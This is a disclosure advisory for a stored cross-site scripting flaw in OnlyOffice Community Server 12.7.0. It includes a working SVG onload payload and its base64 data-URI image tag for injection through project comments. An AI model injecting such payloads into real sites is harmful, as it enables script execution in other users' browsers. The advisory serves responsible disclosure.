OnlyOffice Community Server | Stored XSS via embedding SVG in comment
Information
| Software Type | Web App |
|---|---|
| Software Name | OnlyOffice Community Server |
| Affected Version | 12.7.0 |
| Software Vendor | Ascensio System SIA |
| Software Link | https://github.com/ONLYOFFICE/Docker-CommunityServer |
| Severity | Medium |
| CVSS Score | 4.6 |
| CVE Link | N/A |
| Affected Assets | 10523+ |
| Date of Discovery | Feb 17th, 2025 |
| PoC Exploit | N/A |
Description
In OnlyOffice, users can create projects and add comments. While HTML input is permitted, it also allows embedding SVG images that can contain JavaScript, leading to an XSS vulnerability.
Reproduce
Adding comments to a project:
http://127.0.0.1:8088/Products/Projects/Messages.aspx?prjID=1&id=1#comments
From the comment section, enter raw HTML. The vulnerability can be exploited by abusing the <img> tag to load a base64 encoded SVG image.
Convert the following SVG payload into base64:
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" onload="alert('xss')"><rect width="200" height="200" fill="lightblue" /></svg>Create the payload using the base64 encoded value:
<img src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIiBvbmxvYWQ9ImFsZXJ0KCd4c3MnKSI+PHJlY3Qgd2lkdGg9IjIwMCIgaGVpZ2h0PSIyMDAiIGZpbGw9ImxpZ2h0Ymx1ZSIgLz48L3N2Zz4=" alt="XSS">
The alert will be executed whenever the SVG image loads.
Proof of Concept (PoC) Video
Posted on: May 24, 2025 03:00 AM